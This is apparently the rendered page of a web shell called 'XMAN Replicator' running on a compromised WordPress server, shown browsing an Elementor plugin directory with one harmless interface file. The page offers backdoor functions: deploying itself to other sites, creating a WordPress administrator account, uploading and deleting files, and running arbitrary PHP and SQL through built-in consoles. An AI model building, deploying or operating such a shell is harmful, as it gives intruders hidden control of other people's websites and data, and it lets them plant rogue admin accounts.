🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
home
/
vestsxzf
/
public_html
/
wp-content
/
plugins
/
elementor
/
modules
/
usage
/
contracts
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2026-03-27 10:27
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2026-03-27 10:27
🔄
🗑️
🗑️📁
⬇️
🔒
element-usage-calculator.php
335 B
-rw-r--r--
2026-03-27 10:27
✏️
🔄
🗑️
⬇️
🔒
View: element-usage-calculator.php
<?php namespace Elementor\Modules\Usage\Contracts; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } interface Element_Usage_Calculator { public function can_calculate( array $element, $element_instance ): bool; public function calculate( array $element, $element_instance, array $existing_usage ): array; }
PHP Console
Execute
SQL Console
Execute